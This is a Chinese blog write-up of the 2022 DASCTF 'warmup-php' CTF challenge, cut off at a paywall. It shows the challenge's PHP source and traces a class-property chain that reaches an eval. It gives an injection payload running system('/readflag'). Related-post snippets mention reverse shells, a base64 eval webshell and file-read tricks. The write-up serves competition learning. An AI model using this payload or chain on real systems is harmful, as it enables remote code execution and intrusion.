2022DASCTF Apr X FATE 防疫挑战赛

原创 已于 2022-11-08 15:45:32 修改 · 418 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#2022DASCTF

于 2022-05-05 13:47:11 首次发布
本文详细解析了如何通过PHP代码利用特定漏洞,从Base.php的evaluateExpression函数入手,逐步触发多个函数,最终实现文件读取。涉及到了Phar文件构造、参数操纵和条件竞争等技术,展示了如何在实际环境中利用这些技巧获取源码和执行恶意操作。

warmup-php

先分析一下index.php的内容,创建一个对象,并且循环赋值,然后调用run函数。

<?php
spl_autoload_register(function($class){
   
   
    require("./class/".$class.".php");
});
highlight_file(__FILE__);
error_reporting(0);
$action = $_GET['action'];
$properties = $_POST['properties'];
class Action{
   
   

    public function __construct($action,$properties){
   
   

        $object=new $action();
        foreach($properties as $name=>$value)
            $object->$name=$value;
        $object->run();
    }
}

new Action($action,$properties);
?>

我们先找一下利用可以利用的点:

在Base.php的evaluateExpression函数中有个eval可以利用。

在这里插入图片描述

在TestView.php中的renderTableRow函数可以触发Base.php的evaluateExpression函数。
在这里插入图片描述
而TestView.php中的renderTableRow函数又可以通过renderTableBody函数触发。
在这里插入图片描述
那么怎么触发TestView.php中的renderTableBody函数呢?
在index.php中run函数只有ListView.php有,通过run->renderContent->renderSection来连接一个renderTableBody
在这里插入图片描述
最后链子就是这样子

action->run()->renderContent()->renderSection()->renderTableBody()->renderTableRow()->evaluateExpression()

然后在看一下参数rowHtmlOptionsExpressiondata,row以存在。
在这里插入图片描述

最后payload可以构造为

GET:?action=TestView

POST:1=system('/readflag');&properties[template]={
   
   TableBody}&properties[data]=phph&properties[rowHtmlOptionsExpression]
最低0.47元/天 解锁文章
[2022DASCTF Apr X FATE 防疫挑战赛]web题目复现
cosmoslin的博客
05-02 1132
warmup-php 给了源码: <?php spl_autoload_register(function($class){ require("./class/".$class.".php"); }); highlight_file(__FILE__); error_reporting(0); $action = $_GET['action']; $properties = $_POST['properties']; class Action{ public function __
2022DASCTF Apr X FATE 防疫挑战赛个人Writeup
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
04-24 959
这次下午有事,上午做了两道就溜了,简单记录一下。 Crypto easy_real 读题目代码: import random import hashlib flag = 'xxxxxxxxxxxxxxxxxxxx' key = random.randint(1,10) for i in range(len(flag)): crypto += chr(ord(flag[i])^key) m = crypto的ascii十六进制 e = random.randint(1,100) print(hashlib
2022DASCTF Apr X FATE 防疫挑战赛 warmup-php
weixin_43610673的博客
04-24 2510
主页代码逻辑就是自动加载class下类文件,然后动态调用一个类,并设置成员变量。最后调用类的run()方法。 看uml类图其实就大致有数该实例化哪个类了,TestView 看这几个类文件的内容,很明显的页面模板生成代码,感觉是根据YII2框架的模板渲染提取的主要逻辑 先找漏洞点,在Base类中 再去找调用链,搜索run()方法,在ListView类中 接着跟到renderContent,会去调用类中的renderSection方法,$this->template需为{test}形式,才会被正则
[2022DASCTF Apr X FATE 防疫挑战赛] warmup-php
Sentiment的博客
06-08 841
先看下spl_autoload_register函数用法1.php Test.php 其实就相当于一个文件包含的作用,当实例化对象时,会将我们实例化的内容传入KaTeX parse error: Expected group after '_' at position 42: …实例化Action时,会调用`_̲_construct()`,该…action,如果我们传参action的值为,那么在$object=new Test()后,就相当于包含了,从而也就可以调用类中的A方法了若去掉spl_autoloa
easy_real复现
qq_61774705的博客
04-30 398
题目源码: import random import hashlib flag = 'xxxxxxxxxxxxxxxxxxxx' key = random.randint(1,10) for i in range(len(flag)): crypto += chr(ord(flag[i])^key) m = crypto的ascii十六进制 e = random.randint(1,100) print(hashlib.md5(e)) p = 64310413306776406422334034...
【Web】2022DASCTF Apr X FATE 防疫挑战赛 题解(全)
uuzeray的博客
04-16 1036
spl_autoload_register函数实现了当程序遇到调用没有定义过的函数时,会去找./class/函数名.php路径下的php文件,并把它包含在程序中。于是退一步,用同样的方式去读/var/www/html目录下的upload.php和edit.php。尝试去读/proc/1/environ和/flag均响应403,显然权限不够。访问/uploads/head.png,成功读到/etc/passwd。建立了链接,同时flag也没有被覆盖,然后访问。监听,反弹shell,拿flag。
2022DASCTF Apr X FATE 防疫挑战赛——【Misc】Bindundun
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
04-24 455
冰墩墩 下载附件,解压发现是10万多个txt,找到一个start.txt,打开内容如下: 101000001001011 =>The txt you should view is m9312r95cr.txt 其他文件也是这种格式,发现前部分得数据是15位,左边补零转16进制的话就是0x504B,看到这里应该能想到是压缩包了,写了个垃圾脚本逐个读取文件,将数据拼接并写入文件。 import re path = 'D:\\BinDunDun\\' regex_next = "is (.*?\\.t
2022DASCTF Apr X FATE 防疫挑战赛WP
LaniakeaHarry的博客
04-24 3872
NEFU-NSILIB下Maple战队分队于4月23日10:00 - 18:00所产WriteUp.
[MISC]2022DASCTF Apr X FATE 防疫挑战赛
RookieMOR的博客
05-06 1669
1.SimpleFlow; 2.熟悉的猫; 3.冰墩墩; 1.SimpleFlow: 下载得到SimpleFlow的压缩包,解压得到SimpleFlow.pcapng,流量分析题目。查找 flag. ,可以知道一共有四个flag.txt文件,一个flag.zip文件。用kali的foremost指令可以分离出flag.zip文件,发现flag.zip需要密码。 再追踪每个flag.txt。 发现蚁剑流量,一个一个base64解码, 在其中一个txt文件中得到: Y2QgIi9Vc2Vy.
2022DASCTF Apr X FATE 防疫挑战赛 WriteUP
Huamang的博客
04-25 2608
文章目录MiscSimpleFlowWebwarmup-phpsoeasy_php Misc SimpleFlow 看流量大概是上传了一个后门,但是会对payload加密,这里发现有flag.txt被打包 后面的包里面发现flag.zip 但是打开需要密码,那么我们就要回去压缩的地方,看看给的什么密码,所以我们就得解开这个流量 @eval(@base64_decode($_POST['m8f8d9db647ecd'])); &e57fb9c067c677=o3 &g479cf6f058c
2022DASCTF Apr X FATE 防疫挑战赛 Writeup
末初 · mochu7
04-25 2878
文章目录SimpleFlow熟悉的猫冰墩墩 废物选手的misc做题记录 SimpleFlow 首先tcp.stream eq 50中分析传入的执行命令的变量是$s,也就是参数substr($_POST["g479cf6f058cf8"],2) 找到对应的参数,然后去掉前面两位字符解码即可 cd "/Users/chang/Sites/test";zip -P PaSsZiPWorD flag.zip ../flag.txt;echo [S];pwd;echo [E] 得到压缩包密码:PaSsZi
DASCTF 2022.4
weixin_44687621的博客
04-25 2898
Web warmup_php 查看主页源码如下 <?php spl_autoload_register(function($class){ require("./class/".$class.".php"); }); highlight_file(__FILE__); error_reporting(0); $action = $_GET['action']; $properties = $_POST['properties']; class Action{ public funct
2022DASCTF Apr X FATE 防疫挑战赛 good_luck
臭nana的博客
04-24 903
这道题最开始的附件,代码是随机生成一个0~199的数,然后0触发格式化字符串漏洞,1触发栈溢出漏洞,修改后的附件随机数是0或者1 下面是脚本,脚本逻辑:通过栈溢出返回到格式化字符串漏洞函数,泄露libc地址,然后再返回到main函数,通过栈溢出执行onegadget 几率:第一次执行栈溢出1/2,第二次再次执行栈溢出1/2,1/4的概率执行成功 from pwn import * from LibcSearcher import * context(log_level = "debug") csu
Java Spring架构的php实现,协同架构 (来自老外文章)
super_ufo的笔记
09-04 3574
Java Web 应用程序和 Spring 的 DispatcherServlet 结构为应用程序的 PHP 部分提供了一个极好的模型。与将这样出色的面向对象抽象抛出窗口所不同的是,您将快速地获得有助于模拟 Spring 的属性注入和 MVC 分派功能的一组类。您将编写一个负责读取多个属性文件的 Properties 类,一个使您从那些文件中向类实例注入属性的 Injectable 类,以及一个
超导磁能储存系统的建模和仿真(Simulink仿真实现)
12-09
超导磁能储存系统的建模和仿真(Simulink仿真实现)
基于GPT-4o与GLiNER构建的企业ESG情感与方面时间序列数据集(Nano-ESG)
最新发布
12-09
Nano-ESG数据资源库的构建基于2023年初至2024年秋季期间采集的逾84万条新闻文本,从中系统提炼出企业环境、社会及治理维度的信息。其构建流程首先依据特定术语在德语与英语新闻平台上检索,初步锁定与德国DAX 40成分股企业相关联的报道。随后借助嵌入技术对文本段落执行去重操作,以降低内容冗余。继而采用GLiNER这一跨语言零样本实体识别系统,排除与目标企业无关的文档。在此基础上,通过GPT-3.5与GPT-4o等大规模语言模型对文本进行双重筛选:一方面判定其与ESG议题的相关性,另一方面生成简明的内容概要。最终环节由GPT-4o模型完成,它对每篇文献进行ESG情感倾向(正面、中性或负面)的判定,并标注所涉及的ESG具体维度,从而形成具备时序特征的ESG情感与维度标注数据集。 该数据集适用于多类企业可持续性研究,例如ESG情感趋势分析、ESG维度细分类别研究,以及企业可持续性事件的时序演变追踪。研究者可利用数据集内提供的新闻摘要、情感标签与维度分类,深入考察企业在不同时期的环境、社会及治理表现。此外,借助Bertopic等主题建模方法,能够从数据中识别出与企业相关的核心ESG议题,并观察这些议题随时间的演进轨迹。该资源以其开放获取特性与连续的时间覆盖,为探究企业可持续性表现的动态变化提供了系统化的数据基础。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
Scala设计模式精要
12-09
本书深入探讨Scala语言中的设计模式,融合面向对象与函数式编程思想,系统讲解如单例、建造者、装饰者等经典模式在Scala中的简洁实现。通过实际案例解析,展示如何利用语言特性如特质、柯里化、隐式转换等提升代码复用性与可维护性。适合具备一定Scala基础的开发者进阶学习,帮助理解高阶抽象的设计原理与最佳实践,掌握构建灵活、高效Scala应用的核心模式。
web敏感目录、信息泄漏批量扫描脚本,结合爬虫、目录深度遍历
12-09
下载方式:https://pan.quark.cn/s/548179562a67 webdirdig =================================== web敏感目录\信息泄漏扫描脚本 Basic usage ===================================
arm64交叉编译工具链
12-09
Windows下交叉编译工具链
[DASCTF Apr.2023 X SU战队2023开局之战]【中等】7里香
06-10
根据已知信息,DASCTF Apr.2023赛事中SU战队的题目'7里香'可能涉及文件头补全、EXIF信息提取以及密码解密等操作。以下是可能的解题思路: #### 文件头补全 题目要求补全`jpg`文件头,并添加三个字节`FF D8 FF`作为...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值